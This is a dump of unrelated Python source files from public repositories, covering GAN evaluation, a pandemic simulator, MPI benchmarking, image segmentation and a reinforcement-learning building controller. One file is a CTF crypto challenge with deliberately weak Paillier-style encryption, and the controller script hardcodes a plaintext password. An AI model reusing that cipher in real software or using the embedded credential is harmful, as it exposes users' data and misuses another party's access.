discriminator.load_state_dict(\n torch.load(\n os.path.join(\n args.path_to_checkpoints,\n f'epoch_{args.epoch_num}_discriminator.pt'\n ),\n map_location=device\n )\n )\n discriminator.eval()\n\n return generator, discriminator\n\n\ndef show_examples(args, config, device='cpu', shuffle=False):\n generator, _ = load_models(args, config, device=device)\n\n noisy_phrases = AmericanNationalCorpusDataset(\n config,\n transform_raw_phrase=ObliterateLetters(\n obliterate_ratio=config['replace_with_noise_probability']\n ),\n transform_sample_dict=ToTensor()\n )\n\n noisy_data_loader = DataLoader(\n noisy_phrases,\n batch_size=1,\n num_workers=1,\n shuffle=shuffle\n )\n\n with torch.no_grad():\n for x in itertools.islice(noisy_data_loader, 5):\n _input = x['concat_phrase'].to(device)\n out = generator.forward(_input).cpu()\n print('#' * 40)\n print(noisy_phrases.show(x['raw_phrase']))\n print(noisy_phrases.show(out))\n print('#' * 40)\n\n\ndef measure_accuracy(generator, real_data_loader, fake_data_loader, device):\n correct = 0\n elements = 0\n with torch.no_grad():\n for fake_batch, real_batch in tqdm(\n zip(fake_data_loader, real_data_loader)\n ):\n _input = fake_batch['concat_phrase'].to(device)\n output = generator.forward(_input)\n\n correct += np.sum(\n np.argmax(output.detach().cpu().numpy(), axis=-1)\n == np.argmax(real_batch['raw_phrase'].numpy(), axis=-1)\n )\n elements += reduce(\n operator.mul,\n real_batch['raw_phrase'].shape[:-1],\n 1\n )\n # logging.debug(f'{correct} {elements} {correct / elements}')\n return correct / elements\n\n\ndef eval_with_mean_accuracy(args, config, device):\n noisy_phrases = AmericanNationalCorpusDataset(\n config,\n transform_raw_phrase=ObliterateLetters(\n obliterate_ratio=config['replace_with_noise_probability']\n ),\n transform_sample_dict=ToTensor()\n )\n real_phrases = AmericanNationalCorpusDataset(\n config,\n transform_raw_phrase=None,\n transform_sample_dict=ToTensor()\n )\n test_noisy_data_loader = DataLoader(\n noisy_phrases,\n batch_size=config['batch_size'],\n num_workers=config['num_workers'],\n shuffle=False\n )\n test_real_data_loader = DataLoader(\n real_phrases,\n batch_size=config['batch_size'],\n num_workers=config['num_workers'],\n shuffle=False\n )\n generator, _ = load_models(args, config, device)\n acc = measure_accuracy(\n generator,\n test_real_data_loader,\n test_noisy_data_loader,\n device\n )\n print(f'Mean Accuracy: {acc:.2f}')\n","repo_name":"kkulczak/phrases_reconstruction_GAN","sub_path":"src/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":3804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38167085802","text":"#!/usr/bin/env python3\n#\n# Polymero\n#\n\n# Imports\nimport random\nfrom Crypto.Util.number import GCD, inverse, bytes_to_long, long_to_bytes, getPrime\nfrom time import sleep\n\n\nclass Pravrallier:\n def __init__(self):\n # Keygen\n while True:\n p, q = getPrime(512), getPrime(512)\n if GCD(p*q, (p-1)*(q-1)) == 1:\n break\n self.n = p * q\n # Blinding\n self.r = { r+1 : random.randint(2, self.n-1) for r in range(128) }\n self.i = 1\n\n def fortune(self, msg):\n \"\"\" Generate fortune ticket flavour text. \"\"\"\n nums = [int.from_bytes(msg[i:i+2],'big') for i in range(0,len(msg),2)]\n luck = ['']\n spce = b'\\x30\\x00'.decode('utf-16-be')\n for num in nums:\n if num >= 0x4e00 and num <= 0x9fd6:\n luck[-1] += num.to_bytes(2,'big').decode('utf-16-be')\n else:\n luck += ['']\n luck += ['']\n maxlen = max([len(i) for i in luck])\n for i in range(len(luck)):\n luck[i] += spce * (maxlen - len(luck[i]))\n card = [spce.join([luck[::-1][i][j] for i in range(len(luck))]) for j in range(maxlen)]\n return card\n\n def encrypt_worry(self, msg):\n # Generate fortune ticket\n card = self.fortune(msg)\n # Encrypt\n gm = pow(1 + self.n, bytes_to_long(msg), self.n**2)\n rn = pow(self.r[len(card[0])] * self.i, self.n + self.i, self.n**2)\n cip = (gm * rn) % self.n**2 \n self.i += 1\n return cip, card\n\n def encrypt_flag(self, msg, order, txt):\n # Generate fortune ticket\n card = self.fortune(msg)\n # Encrypt up to given order\n cip = bytes_to_long(msg)\n for o in range(2,order+1):\n cip = pow(1 + self.n, cip, self.n**(o))\n # ???\n print(\"| {}\".format(txt[(o-2) % len(txt)]))\n sleep(3)\n return cip, card\n\n def print_card(self, cip, card):\n \"\"\" Print fortune ticket to terminal. \"\"\"\n upper_hex = long_to_bytes(cip).hex().upper()\n fwascii = list(''.join([(ord(i)+65248).to_bytes(2,'big').decode('utf-16-be') for i in list(upper_hex)]))\n enclst = [''.join(fwascii[i:i+len(card[0])]) for i in range(0, len(fwascii), len(card[0]))]\n # Frame elements\n sp = b'\\x30\\x00'.decode('utf-16-be')\n dt = b'\\x30\\xfb'.decode('utf-16-be')\n hl = b'\\x4e\\x00'.decode('utf-16-be')\n vl = b'\\xff\\x5c'.decode('utf-16-be')\n # Print fortune ticket\n enclst[-1] += sp*(len(card[0])-len(enclst[-1]))\n print()\n print(2*sp + dt + hl*(len(card[0])+2) + dt)\n print(2*sp + vl + dt + hl*len(card[0]) + dt + vl)\n for row in card:\n print(2*sp + 2*vl + row + 2*vl)\n print(2*sp + vl + dt + hl*len(card[0]) + dt + vl)\n for row in enclst:\n print(2*sp + vl + sp + row + sp + vl)\n print(2*sp + dt + hl*(len(card[0])+2) + dt)\n print()\n","repo_name":"sajjadium/ctf-archives","sub_path":"ctfs/K3RN3L/2021/crypto/Shrine_of_the_Sweating_Buddha/pravrallier.py","file_name":"pravrallier.py","file_ext":"py","file_size_in_byte":2965,"program_lang":"python","lang":"en","doc_type":"code","stars":490,"dataset":"github-code","pt":"77"} +{"seq_id":"15499868162","text":"#!/usr/bin/python3\nimport pandas as pd\nimport requests\nimport datetime\nfrom django.http import JsonResponse\n\n\n\"\"\"\nHere we can add / remove our desired target websites before creating csv!\n\"\"\"\nwebsite_lists=[\"https://www.google.com\",\"https://dma.org/\",\n \"https://pandas.pydata.org/\",\"https://github.com/\",\"https://console.aiven.io/\"\n ,'https://www.kaggle.com/','https://www.theconstructsim.com/',\n 'https://grabcad.com/library/','https://medium.com/','http://gordonua.com/','https://www.5.ua/',\n 'https://humanrights.org.ua/','http://www.example.com'\n ]\n\n\ndef lst_to_csv(csv_file_name,list):#for producer\n print(\"This python function create csv file from list!\")\n df=pd.DataFrame(website_lists)\n return df.to_csv(f'{csv_file_name}',header=['target_websites'],index=False)\n\n\ndef monitor_(url):#for producer\n print(\"we are in website monitoring function\")\n req_ = requests.get(url)\n respTime = round(req_.elapsed.total_seconds(),2)\n return respTime,req_.status_code\n \n\n\n\n","repo_name":"Phoowainyein/web-monitoring","sub_path":"functionality.py","file_name":"functionality.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18272929937","text":"from setuptools import setup, find_packages\n\n__version__ = \"0.2.1\"\n\ninstall_requires = [\n 'docker-py',\n]\n\nsetup(\n name=\"dockermachinepy\",\n version=__version__,\n packages=find_packages(),\n install_requires=install_requires,\n package_data={\n '': ['*.rst'],\n },\n author=\"Gijs Molenaar\",\n author_email=\"gijs@pythonic.nl\",\n description=\"Python wrapper around docker-machine\",\n license=\"GPL2\",\n keywords=\"docker machine docker-machine container\",\n url=\"https://github.com/thomasopsomer/pydm\"\n)\n","repo_name":"thomasopsomer/pydm","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29741007811","text":"from view.View import *\nfrom PyQt5 import QtCore, QtWidgets\nfrom PyQt5.QtWidgets import QMainWindow, QLabel, QWidget, QApplication\nfrom model.Simulation import *\nfrom presenter.Constants import *\nfrom model.Constants import *\n\nclass Presenter(QtCore.QObject):\n def __init__(self):\n super(Presenter, self).__init__()\n self.particle_size = DEFAULT_PARTICLE_SIZE\n self.simulation = None\n self.ui = View()\n self.connect_signals()\n\n # simulation not active at start.\n self.active = False\n\n self.fps = DEFAULT_FPS\n self.speed = DEFAULT_SPEED\n\n self.init_timers()\n\n def connect_signals(self):\n self.ui.play_pause_simulation_signal.connect(self.play_pause_simulation)\n self.ui.reset_simulation_signal.connect(self.reset_simulation)\n self.ui.export_data_signal.connect(self.start_export)\n self.ui.fps_changed_signal.connect(self.update_fps)\n self.ui.speed_changed_signal.connect(self.update_speed)\n self.ui.stepsize_changed_signal.connect(self.update_stepsize)\n self.ui.movement_changed_signal.connect(self.update_movement_type)\n self.ui.measures_changed_signal.connect(self.update_measures)\n self.ui.resize_signal.connect(self.adapt_simulation_dimensions)\n\n\n def init_graph_plots(self):\n data = self.simulation.statistics.get_live_data()\n self.ui.init_plotting_data(data[1],data[2])\n\n def init_timers(self):\n self.create_fps_timer()\n self.create_simulation_timer()\n\n def init_simulation(self):\n self.simulation = Simulation(*self.ui.get_simulation_parameters(), *self.ui.get_simulation_dimensions(), particle_size=self.particle_size)\n\n # if particles in particle input bigger than maximum particle count, then make particle count to max particle count.\n max_particles = self.simulation.get_maximum_particle_count()-1\n if self.ui.get_particle_count() > max_particles:\n self.ui.set_particle_count(max_particles)\n self.simulation.particle_count = max_particles\n\n\n if self.ui.correct_infection_count():\n self.simulation.infected_count = self.ui.get_infected_count()\n\n self.ui.set_particle_size(self.particle_size)\n self.init_graph_plots()\n self.update_stepsize()\n self.update_movement_type()\n self.simulation.set_measures(self.ui.get_measure_parameters(self.simulation.particle_count))\n if self.timer == None:\n self.create_simulation_timer()\n self.create_fps_timer()\n\n self.ui.toggle_non_changeable_fields()\n\n def adapt_simulation_dimensions(self):\n if self.simulation != None:\n self.pause_simulation()\n self.simulation.set_dimensions(*self.ui.get_simulation_dimensions())\n self.play_simulation()\n\n def create_fps_timer(self):\n self.timer = QtCore.QTimer(self)\n self.timer.timeout.connect(self.gui_mainloop)\n self.update_fps()\n self.timer.start(1000 // self.fps)\n\n def create_simulation_timer(self):\n self.sim_timer = QtCore.QTimer(self)\n self.sim_timer.timeout.connect(self.simulation_mainloop)\n self.update_speed()\n self.sim_timer.start(1000 // (60*self.speed))\n\n def update_speed(self):\n self.speed = self.ui.get_speed()\n self.sim_timer.stop()\n self.sim_timer.start(1000 // (60*self.speed))\n\n def update_fps(self):\n newfps = self.ui.get_fps()\n if newfps > 0:\n self.fps = newfps\n if self.active:\n self.timer.stop()\n self.timer.start(1000 // self.fps)\n\n def play_pause_simulation(self):\n if self.active == False:\n self.play_simulation()\n else:\n self.pause_simulation()\n\n def pause_simulation(self):\n self.ui.startBtn.setText(\"Play\")\n self.active = False\n\n def play_simulation(self):\n self.ui.startBtn.setText(\"Pause\")\n if self.simulation == None:\n self.init_simulation()\n\n self.active = True\n\n def reset_simulation(self):\n if self.simulation != None:\n self.ui.toggle_non_changeable_fields()\n self.simulation = None\n self.ui.reset_simulation_routine()\n self.pause_simulation()\n\n\n def update_stepsize(self):\n if self.simulation != None:\n new_stepsize = self.ui.get_stepsize()\n was_active = self.active\n if was_active:\n self.pause_simulation()\n self.simulation.change_stepsize(new_stepsize)\n if was_active:\n self.play_simulation()\n\n def simulation_mainloop(self):\n if self.active:\n self.simulation.tick()\n if self.simulation.statistics.check_simulation_finished():\n self.gui_mainloop()\n self.pause_simulation()\n self.ui.simulation_end()\n\n def gui_mainloop(self, oneframe=False):\n if self.active or oneframe: # if simulation is active or one frame update is needed.\n if self.ui.check_diseases_updated(self.simulation.diseases):\n self.ui.draw_mutations(self.simulation.diseases[0], self.simulation.diseases)\n self.ui.update_status_labels(*self.simulation.get_status_counts())\n if self.simulation.tick_counter % self.fps // 4 == 0:\n self.ui.update_graph(*self.simulation.statistics.get_live_data())\n\n self.ui.draw(self.simulation.particles, self.simulation.targets)\n\n def start_export(self):\n if self.simulation != None:\n self.ui.export(*self.simulation.statistics.get_export_data(self.ui.get_granularity()))\n else:\n print(\"No data to export yet. Start Simulation to get data.\")\n\n def update_movement_type(self):\n if self.simulation != None:\n new_movement = self.ui.get_movement_type()\n self.simulation.set_movement(new_movement)\n if new_movement == Movement.DIRECTED:\n self.simulation.add_target(*self.ui.get_target_coordinates())\n\n def update_measures(self):\n self.simulation.set_measures(self.ui.get_measure_parameters(self.simulation.particle_count))\n if self.active == False and self.simulation != None: # render one frame if simulation is paused and measures are changed\n self.gui_mainloop(True)","repo_name":"Elias-W1/pandemic-simulator","sub_path":"presenter/Presenter.py","file_name":"Presenter.py","file_ext":"py","file_size_in_byte":6415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31220252327","text":"import subprocess\r\nimport os\r\nfrom time import sleep\r\nsubprocess.Popen(['make','clean'])\r\nsleep(2)\r\nsubprocess.Popen(['make'])\r\nsleep(2)\r\nf1 = open(\"output.Bcast\",\"w\")\r\nf2 = open(\"output.Gather\",\"w\")\r\nf3 = open(\"output.Reduce\",\"w\")\r\nf4 = open(\"output.Alltoallv\",\"w\")\r\n# running the code\r\nfor e in range(10):\r\n for P in [4,16]: #number of nodes\r\n for ppn in [1,8]: \r\n subprocess.Popen([os.path.expanduser('~/UGP/allocator/src/allocator.out'),str(P*ppn),str(ppn)],stdout=subprocess.DEVNULL)\r\n sleep(2)\r\n for D in [16,256,2048]:\r\n try:\r\n temp = subprocess.check_output(['mpiexec', '-np', str(P*ppn),\"-hostfile\",\"hosts\",'./src', str(D) ],timeout=200) \r\n except:\r\n try:\r\n temp = subprocess.check_output(['mpiexec', '-np', str(P*ppn),\"-hostfile\",\"hostsimproved\",'./src', str(D) ],timeout=200)\r\n except:\r\n break\r\n temp = temp.decode(\"utf-8\") \r\n temp = temp.split('\\n')\r\n print('ok')\r\n print(str(e)+','+str(P)+','+str(ppn)+\",\"+str(D)+' '+temp[0],file=f1)\r\n print(str(e)+','+str(P)+','+str(ppn)+\",\"+str(D)+' '+temp[1],file=f2)\r\n print(str(e)+','+str(P)+','+str(ppn)+\",\"+str(D)+' '+temp[2],file=f3)\r\n print(str(e)+','+str(P)+','+str(ppn)+\",\"+str(D)+' '+temp[3],file=f4)\r\nf1.close()\r\nf2.close()\r\nf3.close()\r\nf4.close()\r\n\r\nfor collective in ['Bcast','Gather','Reduce','Alltoallv']:\r\n subprocess.Popen(['python3','plot.py',collective])\r\nprint(\"plots complete\")\r\n","repo_name":"tharwani/cs633","sub_path":"Assignment2/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3879560434","text":"import math\r\ndef prime(number) :\r\n loop=2\r\n while loop*loop<=number :\r\n if number%loop == 0:\r\n return False\r\n loop += 1\r\n return True\r\ndef primeNumbers(start, end) :\r\n primeList = []\r\n for i in range(start,end) :\r\n if prime(i) :\r\n primeList.append(i)\r\n return primeList\r\ndef checkCircular(number) :\r\n count = len(str(number))\r\n while True :\r\n if int(((math.pow(10, count - 1)) * (number % 10))+ (number / 10) ) == number : \r\n return True\r\n return False\r\nstart = 2\r\nend = 1000000\r\nloopCount = 0\r\ncircularPrime = []\r\nprimeList = primeNumbers(start,end)\r\nprint (primeList)\r\n\"\"\"\r\nfor i in primeList :\r\n if checkCircular(i) :\r\n circularPrime.append(i)\r\nprint (\"loopCount=\",loopCount)\r\nprint (circularPrime)\r\nprint (len(circularPrime))\r\nprint (primeList)\r\n# not completed\r\n\"\"\"\r\n\"\"\"\r\n\r\n\r\nThe number, 197, is called a circular prime because all rotations of the digits: 197, 971, and 719, are themselves prime.\r\n\r\nThere are thirteen such primes below 100: 2, 3, 5, 7, 11, 13, 17, 31, 37, 71, 73, 79, and 97.\r\n\r\nHow many circular primes are there below one million?\r\n\r\n\"\"\"\r\n\r\n# Test case , might work\r\n\"\"\"\r\nimport math\r\ndef prime(number) :\r\n loop=2\r\n while loop*loop<=number :\r\n if number%loop == 0:\r\n return False\r\n loop += 1\r\n return True\r\ndef primeNumbers(start, end) :\r\n primeList = []\r\n for i in range(start,end) :\r\n if prime(i) :\r\n primeList.append(i)\r\n return primeList\r\n\t\r\n# Function to check if the number is \r\n# circular prime or not. \r\ndef checkCircular(N) :\r\n #Count digits. \r\n\tcount = 0\r\n\ttemp = N \r\n\twhile (temp > 0) : \r\n\t\tcount = count + 1\r\n\t\ttemp = temp / 10\r\n num = N\r\n\twhile True : \r\n\t\t\r\n\t\t# Following three lines generate the \r\n\t\t# next circular permutation of a \r\n\t\t# number. We move last digit to \r\n\t\t# first position. \r\n\t\trem = num % 10\r\n\t\tdiv = num / 10\r\n\t\tnum = int(((math.pow(10, count - 1)) * rem)+ div )\r\n\r\n\t\t# If all the permutations are checked \r\n\t\t# and we obtain original number exit \r\n\t\t# from loop. \r\n\t\tif (num == N) : \r\n\t\t\treturn True\r\n\t\r\n\treturn False\r\n\t\r\n# Driver Program \r\nN = primeNumbers(1,100)\r\ncount = 0\r\nfor i in N :\r\n if (checkCircular(i)) : \r\n count += 1\r\nprint (count)\r\n# This code is contributed by Nikita Tiwari \r\n\"\"\"","repo_name":"SanjayPJ/ProjectEuler","sub_path":"Project Euler/Circular Primes NC.py","file_name":"Circular Primes NC.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31467449877","text":"def divide(a, b, n):\n assert a > 0 and b > 0\n if a > n:\n gcdv, x, y = xgcd(a, n)\n else:\n gcdv, x, y = xgcd(n, a)\n assert gcdv == 1\n\n return (b * y) % n\n\n\ndef xgcd(a, b):\n x0, x1, y0, y1 = 1, 0, 0, 1\n while b != 0:\n q, a, b = a // b, b, a % b\n x0, x1 = x1, x0 - q * x1\n y0, y1 = y1, y0 - q * y1\n return a, x0, y0\n","repo_name":"Arkioner/CourseraWhatIsAProof","sub_path":"src/Modular/ModularDivision/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6151620470","text":"import sklearn\nimport torch\nimport torchvision\nimport matplotlib\nimport matplotlib.pyplot as plt\nmatplotlib.style.use('ggplot')\n\nimport os\nroot = os.path.dirname(os.path.join(\n 'havingfun/detection/segmentation/saved_imgs/'\n ))\n\nimport numpy as np\nimport sklearn.metrics as metrics\n\nmodelname = 'Lightunet18_MSE_SGD'\nlr = '8.59e2'\nepochs = 'e10'\nprocess_model_param = 'process_' + modelname + '_' + lr + '_' + epochs + '.pth'\nmodel_param = modelname + '_' + lr + '_' + epochs + '.pth'\nloss_imgs = 'Loss_'+ modelname + '_' + lr + '_' + epochs +'.png'\nacc_imgs = 'Acc_' + modelname + '_' + lr + '_' + epochs +'.png'\nshow_imgs = 'Show_' + modelname + '_' + lr + '_' + epochs +'.png'\n\n# save the model\ndef save_model(epochs, model, optimizer, criterion):\n torch.save({\n 'epoch': epochs,\n 'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict(),\n 'loss': criterion,\n }, os.path.join(root,process_model_param))\n\ndef save_entire_model(epochs, model, optimizer, criterion):\n torch.save({\n 'epoch': epochs,\n 'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict(),\n 'loss': criterion,\n }, os.path.join(root, model_param))\n\ndef load_model(checkpoint, model):\n print('======> Loading checkpoint')\n model.load_state_dict(checkpoint['model_state_dict'])\n\n# compute accuracy\n# segmentation codes\ncodes = ['Target', 'Void']\nnum_classes = 2\nname2id = {v:k for k, v in enumerate(codes)}\nvoid_code = name2id['Void']\n \ndef save_predictions_as_imgs(loader, model, folder = root, device = 'cuda'):\n print('===========> saving prediction')\n for idx, (x, y) in enumerate(loader):\n x = x.to(device = device)\n with torch.no_grad():\n preds = torch.sigmoid(model(x))\n preds = (preds > 0.5).float()\n torchvision.utils.save_image(\n preds, \n os.path.join(root, 'seg_result.png'),\n )\n torchvision.utils.save_image(\n y.unsqueeze(1), f'{folder}{idx}.png')\n\n model.train()\n\ndef save_plots(train_acc, val_acc, train_loss, val_loss):\n print(f'====> Saving processing ratios')\n plt.figure(figsize = (10, 7))\n plt.plot(\n train_acc, color = 'green', linestyle = '-', label = 'Train accuracy'\n )\n plt.plot(\n val_acc, color = 'blue', linestyle = '-', label = 'Validation accuracy'\n )\n plt.xlabel('Epochs')\n plt.ylabel('Segmentation Accuracy')\n plt.legend()\n plt.savefig(os.path.join(root, acc_imgs))\n\n plt.figure(figsize = (10, 7))\n plt.plot(\n train_loss, color = 'orange', linestyle = '-', label = 'Train loss'\n )\n plt.plot(\n val_loss, color = 'red', linestyle = '-', label = 'Validation loss'\n )\n plt.xlabel('Epochs')\n plt.ylabel('Segmentation Loss')\n plt.legend()\n \n plt.savefig(os.path.join(root, loss_imgs))\n\ndef plot_img_and_mask(img, pred, mask):\n print('=====> Saving prediction result')\n fig, ax = plt.subplots(3, 1)\n # plt.grid = False \n # plt.xticks([]), plt.yticks([])\n\n fig = plt.figure()\n fig.set_size_inches(50,20)\n ax1 = fig.add_subplot(131)\n ax1.grid(False)\n ax1.set_title('Input Image')\n ax1.imshow(img)\n\n ax2 = fig.add_subplot(132)\n ax2.grid(False)\n ax2.set_title('Output Prediction')\n ax2.imshow(pred)\n \n ax3 = fig.add_subplot(133)\n ax3.grid(False)\n ax3.set_title('Target Mask')\n ax3.imshow(mask)\n\n plt.savefig(os.path.join(root, show_imgs))\n\n# if __name__ == '__main__':\n # save_model()\n # load_model()\n # save_model()\n # check_accuracy()\n # save_predictions_as_imgs()\n # save_plots()\n ","repo_name":"lee-shun/forest_fire_detection_system","sub_path":"scripts/develop/detection_part/segmentation/lightunet18/lightutils.py","file_name":"lightutils.py","file_ext":"py","file_size_in_byte":3685,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"77"} +{"seq_id":"16486269647","text":"import numpy as np;import pandas as pd\nfrom DQN_Agent_test import DQN_Agent\nfrom pathlib import Path\nimport sys\nsys.path.insert(0, str(Path(__file__).parent.absolute().parent.parent.parent / 'interfaces' / 'openai-gym'))\nfrom boptestGymEnv import BoptestGymEnv\nimport math\nimport matplotlib.pyplot as plt\n\n\ndef plot(zonetemp, heatingcoil, Historian, axes, plotutils):\n\n time_hours = [time / 3600 for time in Historian[\"time\"]]\n axes[0].cla()\n axes[1].cla()\n axes[0].set_title('Zone temperature', fontweight='bold')\n axes[0].set_ylim(15, 27)\n axes[0].set_xlim(0, plotutils['length'] / 3600)\n axes[0].set_xticks(range(0, int(plotutils['length'] / 3600) + 6, 6))\n axes[0].set_ylabel('Temperature [C]')\n axes[0].set_yticks([i for i in range(15, 28)])\n axes[0].grid(which='both', linewidth=0.5, color='white')\n axes[0].set_facecolor(\"gainsboro\")\n\n axes[1].set_title('Heating coil power demand (thermal)', fontweight='bold')\n axes[1].set_ylim(0, 15000)\n axes[1].set_xlim(0, plotutils['length'] / 3600)\n axes[1].set_xticks(range(0, int(plotutils['length'] / 3600) + 6, 6))\n axes[1].set_ylabel('Watts [W]')\n axes[1].set_xlabel('Time [hours]')\n axes[1].set_yticks([i for i in range(0, 16000, 1000)])\n axes[1].grid(which='both', linewidth=0.5, color='white')\n axes[1].set_facecolor(\"gainsboro\")\n\n axes[0].plot(plotutils['time'], plotutils['lostp'], color='red', ls='--', label='Setpoints')\n axes[0].plot(plotutils['time'], plotutils['histp'], color='red', ls='--')\n axes[0].plot(time_hours, zonetemp, label='Zone temperature')\n axes[1].plot(time_hours, heatingcoil)\n axes[0].legend(loc='upper right')\n plt.tight_layout()\n plt.draw()\n plt.pause(0.5)\n\n# --------------------\n# Set parameters for initializing the gym environment\n\nstep = 300\nepisode_length = 3600*1*24 # Set the simulation length in seconds\nday_no = 3 #np.random.choice([1,2,4,5,8,9,10,11,12,15,16,17,18])\nstart_time=24*3600*day_no # Specify the start time of the simulation\nactions = ['PSZACcontroller_oveHeaPer1_u'] # Specify which control actions to actuate by specifying the keys\nkpi_zones = [\"1\"] # Select which zone KPI to be included in the reward function\n\n''' Form the Observation States '''\nbuilding_obs = ['senTemRoom1_y','senHouDec_y'] # Specify which building sensor states to return as observation States\nforecast_obs = {'TDryBul':[0],'HGloHor':[0]} # Specify which exogenous states to return as observation States - 0: index means current, 1: index means forecasted state 1 hour ahead\n\n# Set the weights for the different KPIs to form the reward function\nKPI_rewards = {\n \"ener_tot\": {\"hyper\": -120, \"power\": 1},\n \"tdis_tot\": {\"hyper\": -160, \"power\": 1},\n \"idis_tot\": {\"hyper\": 0, \"power\": 1},\n \"cost_tot\": {\"hyper\": 0, \"power\": 1},\n \"emis_tot\": {\"hyper\": 0, \"power\": 1},\n \"power_pen\":{\"hyper\": 0, \"power\": 1}} # mainly used for DR power penalty\n# --------------------\n\n\n# Initiliaze the environment\nenv = BoptestGymEnv(episode_length=episode_length,\n testcase='spawnrefsmalloffice',\n Ts=step,\n start_time=start_time,\n actions=actions,\n building_obs=building_obs,\n forecast_obs=forecast_obs,\n kpi_zones= kpi_zones,\n password = 'dbuass642yo', # put your own password\n lower_obs_bounds=[273.15+15, 0, -12, 0], # manually set the lower bounds for observation\n upper_obs_bounds=[273.15+27, 24, 5, 195.8], # manually set the upper bounds for observation\n KPI_rewards=KPI_rewards,\n n_obs = True) # if set to True returns a normalized state vector between 0-1\n\nkpi_list = ['ener_tot', 'tdis_tot', 'idis_tot', 'cost_tot', 'emis_tot']\nstate_size = env.observation_space.shape[0]\n\nprint (\"State_size :{}\".format(state_size))\n\nepisodes= 1\nlast_ep= 120\n\nAgent_1 = DQN_Agent(state_size, 5)\n\n\n# RUN TEST CASE -\n# -------------\n\n\nHistorian = {key: [] for key in ['time', 'states', 'rewards', 'episodes', 'action_1','senTemOA_y','day_no',\n 'senTRoom_y','senTRoom1_y','senTRoom2_y','senTRoom3_y','senTRoom4_y',\n 'Total_Pow_Dem_0','Total_Pow_Dem_1','Total_Pow_Dem_2','Total_Pow_Dem_3','Total_Pow_Dem_4',\n 'Heating_Pow_Dem_0','Heating_Pow_Dem_1','Heating_Pow_Dem_2','Heating_Pow_Dem_3','Heating_Pow_Dem_4',\n 'Cooling_Pow_Dem_0','Cooling_Pow_Dem_1','Cooling_Pow_Dem_2','Cooling_Pow_Dem_3','Cooling_Pow_Dem_4',\n 'Zone_1_HC_Action']}\n#'Damper_0','Damper_1','Damper_2','Damper_3','Damper_4'\nKPI_hist = {key: [] for key in kpi_list}\nKPI_hist['episodes'] = []\nKPI_hist['scores'] = []\nKPI_hist['day_no'] = []\n# --------------------\n\n# loading previous memory buffer\nif last_ep == 0:\n mem_list_1 = []\nelse:\n mem_list_1 = pd.read_csv(\"RL_Data_test/04_Mem/mem_data_\" + str(last_ep) + \".csv\", dtype=object)\n mem_list_1.drop(mem_list_1.columns[0], axis=1, inplace=True)\n mem_list_1['Action'] = mem_list_1['Action'].astype('float')\n mem_list_1['Reward'] = mem_list_1['Reward'].astype('float')\n mem_list_1['States'] = mem_list_1['States'].map(\n lambda x: \" \".join((x.strip('[').strip(']').replace(\"\\n\", \"\")).split()))\n mem_list_1['States'] = mem_list_1['States'].map(\n lambda x: np.reshape(np.array(x.split(' '), dtype=np.float32), (1, -1)))\n mem_list_1['Next_State'] = mem_list_1['Next_State'].map(\n lambda x: \" \".join((x.strip('[').strip(']').replace(\"\\n\", \"\")).split()))\n mem_list_1['Next_State'] = mem_list_1['Next_State'].map(\n lambda x: np.reshape(np.array(x.split(' '), dtype=np.float32), (1, -1)))\n\n for i in range(len(mem_list_1)):\n state_m1 = mem_list_1.iloc[i][0];\n action_m1 = mem_list_1.iloc[i][1]\n reward_m1 = mem_list_1.iloc[i][2];\n next_state_m1 = mem_list_1.iloc[i][3];\n done_m1 = mem_list_1.iloc[i][4]\n Agent_1.append_sample(state_m1, action_m1, reward_m1, next_state_m1, done_m1)\n\nprint (\"Loading Weights\")\nAgent_1.model_load_weights(\"RL_Data_test/02_NN/DQN_\" + str(last_ep) + \".h5\") # From 2nd episode\n\n\nprint('\\n Starting Simulation...')\nplotutils = dict(time = [i / 3600 for i in range(0, int(episode_length) + step, step)],\n lostp = [21 if 6 <= i / 3600 <= 20 else 15.6 for i in range(0, int(episode_length) + step, step)],\n histp = [24 if 6 <= i / 3600 <= 20 else 26.7 for i in range(0, int(episode_length) + step, step)],\n length = episode_length)\nzonetemp = []\nheatingcoil = []\nfig, axes = plt.subplots(2, 1, figsize=(10,10))\nplt.ion()\nplt.show()\n\n# Simulation Loop\nfor e in range(last_ep,last_ep+episodes):\n\n day_no = np.random.choice([10,11,12,15,16,17,18,19,22,23,24,25,26])\n start_time = 24 * 3600 * day_no\n env = BoptestGymEnv(episode_length=episode_length,\n testcase='spawnrefsmalloffice',\n Ts=step,\n start_time=start_time,\n actions=actions,\n building_obs=building_obs,\n forecast_obs=forecast_obs,\n kpi_zones=kpi_zones,\n password='dbuass642yo', # put your own password\n lower_obs_bounds=[273.15 + 15, 0, -12, 0], # manually set the lower bounds for observation\n upper_obs_bounds=[273.15 + 27, 24, 5, 195.8], # manually set the upper bounds for observation\n KPI_rewards=KPI_rewards,\n n_obs=True) # if set to True returns a normalized state vector between 0-1\n\n print (\"loading weights\")\n Agent_1.model_load_weights(\"RL_Data_test/02_NN/DQN_\" + str(e) + \".h5\") # From 2nd episode\n Agent_1.update_target_model()\n score = 0\n e = e + 1\n print('\\nRunning controller script...')\n state = env.reset() # check if the reset function resets the weights as well\n\n\n\n print (\"State\")\n print (state)\n\n print(\"Modified State\")\n print(state)\n\n state = np.reshape(state, [1, state_size]) \n counter = 0\n\n for i in range(int(episode_length/step)):\n print(\"Day:{}\".format(day_no))\n print(\"episode\")\n print(e)\n print(\"Time Step\")\n print(step) \n\n print(\"Agent 